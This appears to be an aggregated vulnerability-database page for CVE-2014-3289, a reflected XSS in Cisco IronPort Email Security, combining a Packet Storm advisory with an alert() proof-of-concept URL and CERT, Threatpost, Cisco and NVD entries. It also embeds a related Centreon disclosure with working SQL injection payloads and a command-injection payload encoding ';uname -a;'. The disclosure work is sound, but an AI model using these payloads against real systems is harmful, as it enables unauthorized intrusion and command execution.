Cisco Ironport Email Security Virtual Appliance 8.0.0-671 XSS

2014-06-09T00:00:00

Description

{"id": "PACKETSTORM:127004", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Cisco Ironport Email Security Virtual Appliance 8.0.0-671 XSS", "description": "", "published": "2014-06-09T00:00:00", "modified": "2014-06-09T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/", "score": 4.3}, "href": "https://packetstormsecurity.com/files/127004/Cisco-Ironport-Email-Security-Virtual-Appliance-8.0.0-671-XSS.html", "reporter": "William Costa", "references": [], "cvelist": ["CVE-2014-3289"], "lastseen": "2016-12-05T22:23:00", "viewCount": 11, "enchantments": {"score": {"value": 5.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "cert", "idList": ["VU:613308"]}, {"type": "cisco", "idList": ["CISCO-SA-20140609-CVE-2014-3289"]}, {"type": "cve", "idList": ["CVE-2014-3289"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128740"]}, {"type": "threatpost", "idList": ["THREATPOST:882B0B7351822FF76556F5DEFFF3C512"]}], "rev": 4}, "backreferences": {"references": [{"type": "cisco", "idList": ["CISCO-SA-20140609-CVE-2014-3289"]}, {"type": "cve", "idList": ["CVE-2014-3289"]}]}, "exploitation": null, "vulnersScore": 5.2}, "sourceHref": "https://packetstormsecurity.com/files/download/127004/ciscoironport-xss.txt", "sourceData": "`I. VULNERABILITY \n------------------------- \n \nReflected XSS Attacks vulnerabilities in Cisco Ironport Email Security \nVirtual Appliance Version: 8.0.0-671 \n \nII. BACKGROUND \n------------------------- \nCisco Systems, Inc. is an American multinational corporation headquartered \nin San Jose, California, that designs, manufactures, and sells networking \nequipment. \n \nIII. DESCRIPTION \n------------------------- \nHas been detected a Reflected XSS vulnerability in Cisco Ironport Email \nSecurity Virtual appliance. \nThe code injection is done through the parameter \"date_range\" in the page \u201c \n/monitor/reports/overview?printable=False&date_range\u201d \n \nIV. PROOF OF CONCEPT \n------------------------- \nThe application does not validate the parameter \u201cdate_range\u201d correctly. \n \nhttps://ip_cisco_web_security/monitor/reports/overview?printabl \ne=False&date_range=aaaa<script>alert(2)</script> \n \nV. BUSINESS IMPACT \n------------------------- \nAn attacker can execute arbitrary HTML or script code in a targeted \nuser's browser, , that allows the execution of arbitrary HTML/script code \nto be executed in the context of the victim user's browser. \n \nVI. SYSTEMS AFFECTED \n------------------------- \nReflected XSS Attacks vulnerabilities in Cisco Ironport Email Security \nVirtual Appliance Version: 8.0.0-671. \n \nVII. SOLUTION \n------------------------- \nhttp://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014-3289 \n \nBy William Costa \n \nwilliam.costa@gmail.com \n \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}

{"cert": [{"lastseen": "2021-09-28T17:50:01", "description": "### Overview\n\nCisco AsyncOS contains a reflected cross-site scripting (XSS) vulnerability.\n\n### Description\n\n[**CWE-79**](<http://cwe.mitre.org/data/definitions/79.html>)**: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CVE-2014-3289**\n\nCisco AsyncOS, the underlying OS for the Cisco Email Security Appliance, Web Security Appliance, and Content Security Management Appliance, contains a reflected cross-site scripting vulnerability in the reports overview page of the management interface. An attacker is able to load arbitrary script in the context of the user's browser through the `date_range` parameter. \n \n**Affected Products:**\n\n * Cisco Email Security Appliance 8.0 and earlier\n * Cisco Web Security Appliance 8.0 and earlier\n * Content Security Management Appliance 8.3 and earlier \n--- \n \n### Impact\n\nA remote unauthenticated attacker may be able to execute arbitrary script in the context of the end-user's browser session. \n \n--- \n \n### Solution\n\n**Apply an Update**Cisco has released a [patch ](<http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014-3289>)to address this vulnerability. If you are unable to upgrade, please consider the following workaround. \n \n--- \n \n**Restrict Access** \nAs a general good security practice, only allow connections from trusted hosts and networks. Note that restricting access does not prevent XSS or CSRF attacks since the attack comes as an HTTP request from a legitimate user's host. Restricting access would prevent an attacker from accessing the web interface using stolen credentials from a blocked network location. \n \n--- \n \n### Vendor Information\n\n613308\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Cisco Systems, Inc. Affected\n\nNotified: February 17, 2014 Updated: June 10, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014-3289>\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 4.3 | AV:N/AC:M/Au:N/C:N/I:P/A:N \nTemporal | 3.6 | E:F/RL:OF/RC:C \nEnvironmental | 2.7 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <http://www.cisco.com/c/en/us/products/security/email-security-appliance/asyncos_index.html>\n * <http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014-3289>\n * <http://cwe.mitre.org/data/definitions/79.html>\n\n### Acknowledgements\n\nThanks to William Costa for reporting this vulnerability.\n\nThis document was written by Chris King.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2014-3289](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-3289>) \n---|--- \n**Date Public:** | 2014-06-09 \n**Date First Published:** | 2014-06-10 \n**Date Last Updated: ** | 2014-06-10 13:50 UTC \n**Document Revision: ** | 15 \n", "cvss3": {}, "published": "2014-06-10T00:00:00", "type": "cert", "title": "Cisco AsyncOS contains a reflected cross-site scripting (XSS) vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3289"], "modified": "2014-06-10T13:50:00", "id": "VU:613308", "href": "https://www.kb.cert.org/vuls/id/613308", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:41", "bulletinFamily": "info", "cvelist": ["CVE-2014-3289"], "description": "There\u2019s a reflected cross-site scripting vulnerability in a variety of Cisco security appliances that enables a remote, unauthenticated attacker to execute arbitrary code in the context of the user.\n\nThe vulnerability affects the Cisco Email Security Appliance, the Cisco Web Security Appliance and the Content Security Management Appliance. Cisco has released updated software to fix the flaw for each of the affected appliances. The problem lies in the AsyncOS, the operating system that runs on the Cisco security appliances.\n\nThe problem lies in the AsyncOS, the operating system that runs on the Cisco security appliances.\n\n\u201cCisco AsyncOS, the underlying OS for the Cisco Email Security Appliance, Web Security Appliance, and Content Security Management Appliance, contains a reflected cross-site scripting vulnerability in the reports overview page of the management interface. An attacker is able to load arbitrary script in the context of the user\u2019s browser through the date_range parameter,\u201d an [advisory](<http://www.kb.cert.org/vuls/id/613308>) from the CERT/CC at Carnegie Mellon University says.\n\nThe vulnerability affects the following products from Cisco:\n\n * Cisco Email Security Appliance 8.0 and earlier\n * Cisco Web Security Appliance 8.0 and earlier\n * Content Security Management Appliance 8.3 and earlier\n\nCisco officials said that the vulnerability could be exploited through a simple malicious URl.\n\n\u201cThe vulnerability is due to insufficient input validation of a parameter. An attacker could exploit this vulnerability by convincing the user to access a malicious link,\u201d the Cisco [advisory](<http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014-3289>) says.\n\nThe CERT/CC advises customers who can\u2019t upgrade immediately to consider restricting access to only trusted hosts.\n\n\u201cAs a general good security practice, only allow connections from trusted hosts and networks. Note that restricting access does not prevent XSS or CSRF attacks since the attack comes as an HTTP request from a legitimate user\u2019s host. Restricting access would prevent an attacker from accessing the web interface using stolen credentials from a blocked network location,\u201d the advisory says.\n", "modified": "2014-06-11T21:01:44", "published": "2014-06-10T10:47:30", "id": "THREATPOST:882B0B7351822FF76556F5DEFFF3C512", "href": "https://threatpost.com/cisco-patches-xss-flaw-in-security-appliances/106558/", "type": "threatpost", "title": "Cisco Patches XSS Flaw in Security Appliances", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "cisco": [{"lastseen": "2022-06-05T10:05:17", "description": "A vulnerability in the web management interface of Cisco AsyncOS could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web interface on the affected system.\n\nThe vulnerability is due to insufficient input validation of a parameter. An attacker could exploit this vulnerability by convincing the user to access a malicious link.\n\nCisco has confirmed the vulnerability in a security notice; however, software updates are not available.\n\nTo exploit the vulnerability, the attacker may provide a link that directs a user to a malicious site and use misleading language or instructions to persuade the user to follow the provided link.\n\nCisco indicates through the CVSS score that functional exploit code exists; however, the code is not known to be publicly available.", "cvss3": {}, "published": "2014-06-09T20:38:39", "type": "cisco", "title": "Cisco AsyncOS Cross-Site Scripting Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3289"], "modified": "2014-06-09T20:38:39", "id": "CISCO-SA-20140609-CVE-2014-3289", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20140609-CVE-2014-3289", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T12:50:32", "description": "Cross-site scripting (XSS) vulnerability in the web management interface in Cisco AsyncOS on the Email Security Appliance (ESA) 8.0, Web Security Appliance (WSA) 8.0 (.5 Hot Patch 1) and earlier, and Content Security Management Appliance (SMA) 8.3 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted parameter, as demonstrated by the date_range parameter to monitor/reports/overview on the IronPort ESA, aka Bug IDs CSCun07998, CSCun07844, and CSCun07888.", "cvss3": {}, "published": "2014-06-10T11:19:00", "type": "cve", "title": "CVE-2014-3289", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3289"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/o:cisco:ironport_asyncos:8.3", "cpe:/h:cisco:web_security_appliance:-", "cpe:/h:cisco:content_security_management_appliance:-", "cpe:/o:cisco:ironport_asyncos:8.0", "cpe:/o:cisco:email_security_appliance_firmware:-"], "id": "CVE-2014-3289", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3289", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:h:cisco:content_security_management_appliance:-:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ironport_asyncos:8.3:*:*:*:*:*:*:*", "cpe:2.3:h:cisco:web_security_appliance:-:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ironport_asyncos:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:email_security_appliance_firmware:-:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:24:12", "description": "", "cvss3": {}, "published": "2014-10-18T00:00:00", "type": "packetstorm", "title": "Centreon SQL Injection / Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-3828", "CVE-2014-3829", "CVE-2014-3289"], "modified": "2014-10-18T00:00:00", "id": "PACKETSTORM:128740", "href": "https://packetstormsecurity.com/files/128740/Centreon-SQL-Injection-Command-Injection.html", "sourceData": "`# Multiple unauthenticated SQL injections and unauthenticated remote \ncommand injection in Centreon <= 2.5.2 and Centreon Enterprise Server <= \n2.2|3.0 \n# \n# Product link: http://www.centreon.com/ \n# CVE references \n# |- CVE-2014-3828: Unauthenticated SQL injections \n# |- CVE-2014-3829: Unauthenticated remote command injection \n# CERT/CC reference: VU#298796 \n# Author: MaZ \n \nTL;DR \n----- \nCentreon is vulnerable to several pre-auth SQLi and a cool pre-auth rci: \nthe only prerequisites to exploit the rci is to have at least one user \n(you, your fav sysadmin or someone else) connected to the WebUI. \nAll Centreon versions from 2008 (v2.0) are vulnerable to the rci. Vulns \nwere originally found for the 2.5.1 version but the 2.5.2 seems to be \nstill vulnerable. \nSee the quick'n'dirty PoC below. A msf module might be soon be \navailable. \n \n \nPoC \n--- \n> SQL injections: \n------------------ \n[POST] \nhttp://server/centreon/include/configuration/configObject/traps/GetXMLTrapsForVendor.php \n[POST DATA] mnftr_id=1 or 1=1 union all select version(),2 -- /** \n \n[POST] \nhttp://server/centreon/include/common/javascript/commandGetArgs/cmdGetExample.php \n[POST DATA] index=2' or 1=1 -- /** \n \n[GET] http://server/centreon/include/views/graphs/GetXmlTree.php?sid=' \nor 1=1 -- /** \n \n[GET] \nhttp://server/centreon/include/views/graphs/graphStatus/displayServiceStatus.php?session_id=0' \nor 1=1 -- /**&index=1' or 1=1 -- /** \n \n[GET] \nhttp://server/centreon/include/views/graphs/common/makeXML_ListMetrics.php?index_id=' \nunion select @@version,2,3 -- /** \n \n> Remote Command Injection \n--------------------------- \nFor older versions, the URL is not: \nhttp://server/centreon/include/views/graphs/graphStatus/displayServiceStatus.php \nbut: \nhttp://server/centreon/include/views/graphs/statusGraphs/displayServiceStatus.php. \n \n[PAYLOAD] \";uname -a;\" which has to be converted to SQL \"CHAR(59, 32, \n117, 110, 97, 109, 101, 32, 45, 97, 59)\" \n \n[GET] \nhttp://server/centreon/include/views/graphs/graphStatus/displayServiceStatus.php \n?session_id=' or 1=1 -- /** \n&template_id=' UNION ALL SELECT 1,2,3,4,5,CHAR(59, 32, 117, 110, 97, \n109, 101, 32, 45, 97, \n59),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- /** \n \n \nDetails \n------- \n> SQLi injections: \n------------------ \nSee for yourself \n$ cd www/ \n$ grep -inr \"DB->query(\" . |grep -P \"$_(GET|POST)\" \n \n> Remote Command Injection \n--------------------------- \nThe following world-accessible file \n\"www/include/views/graphs/graphStatus/displayServiceStatus.php\" contains \nfew coding mistakes. \nThe purpose of this script is to produce a graph, relying on the \nexecution of a shell command involving the \"graph\" executable: a \nmis-escaped shell command is built throughout the script. \n \nWell first, there's an SQLi in the request which checks for an active \nsession (someone has to be currently logged). From line 70 : \n/* \n* Verify if session is active \n*/ \n \n$session = $pearDB->query(\"SELECT * FROM `session` WHERE session_id = \n'\".$_GET[\"session_id\"].\"'\"); \n \n \nThen, some graph parameters are taken from a template id. The associated \nrequest is also vulnerable to SQLi. \nFrom line 120 you have the code responsible for setting the variable \n$template_id : \nif (!isset($_GET[\"template_id\"])|| !$_GET[\"template_id\"]){ \n$host_id = getMyHostID($index_data_ODS[\"host_name\"]); \n$svc_id = getMyServiceID($index_data_ODS[\"service_description\"], \n$host_id); \n$template_id = getDefaultGraph($svc_id, 1); \n$index = $index_data_ODS[\"id\"]; \n} else \n$template_id = $_GET[\"template_id\"]; \n \n \nThen, there's an SQLi in the request which gets there graph parameters. \nFrom line 140: \n/* \n* get all template infos \n*/ \n \n$DBRESULT = $pearDB->query(\"SELECT * FROM giv_graphs_template WHERE \ngraph_id = '\".$template_id.\"' LIMIT 1\"); \n$GraphTemplate = $DBRESULT->fetchRow(); \n \n \nThen, these graph parameters are put into the command. Notably the \n\"base\" parameter, corresponding to the 6th column in the \n'giv_graphs_template' table. \nFrom line 163: \n$base = \"\"; \nif (isset($GraphTemplate[\"base\"]) && $GraphTemplate[\"base\"]) \n{ \n$base = \"-b \".$GraphTemplate[\"base\"]; \n} \n \nAt line 184: \n$command_line .= \" --interlaced $base --imgformat PNG \n--width=\".$GraphTemplate[\"width\"].\" \n--height=\".$GraphTemplate[\"height\"].\" \"; \n \n \nThen, the command line is escaped...but some special chars, notably ';', \nare missed: \nFrom line 254: \n/* \n* Escale special char \n*/ \n$command_line = escape_command(\"$command_line\"); \n \nFrom line 38: \nfunction escape_command($command) { \nreturn preg_replace(\"/(\\\\\\$|`)/\", \"\", $command); \n} \n \n \nFinally and to top it all, the command gets executed and the stdout is \nechoed. \nFrom line 259: \n$fp = popen($command_line , 'r'); \nif (isset($fp) && $fp ) { \n$str =''; \nwhile (!feof ($fp)) { \n$buffer = fgets($fp, 4096); \n$str = $str . $buffer ; \n} \nprint $str; \n} \n \n \nSolution \n-------- \nBrace yourself and \n* Delete displayServiceStatus.php: I don't know if it'll break something \nor not \n* Wait for patches \n \n \nTimeline \n-------- \nJun 3, 2014: Discoverer found vulns, asked for CVE and contacted vendor \nthrough their contact@ and sales@ mail. Not a single f*** seems to be \ngiven from them \nJun 21, 2014: Discoverer contacted Rapid7. Yes, they're cool \nAug 04, 2014: Rapid7 validated CVE-2014-3289 \nAug 11, 2014: Rapid7 validated CVE-2014-3828 \nAug 28, 2014: Researcher and Rapid7 agree to disclose to CERT/CC. \nSep 2, 2014: Disclosure to CERT/CC. They'll try to reach the vendor. \nPublic disclosure date is set on October 15, 2014 \nOct 16, 2014: No fix or news from Centreon. Not a single f*** is \ndefinitely given. Public disclosure. Period \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128740/centreon-sqlexec.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}

Cisco Ironport Email Security Virtual Appliance 8.0.0-671 XSS

Description

Related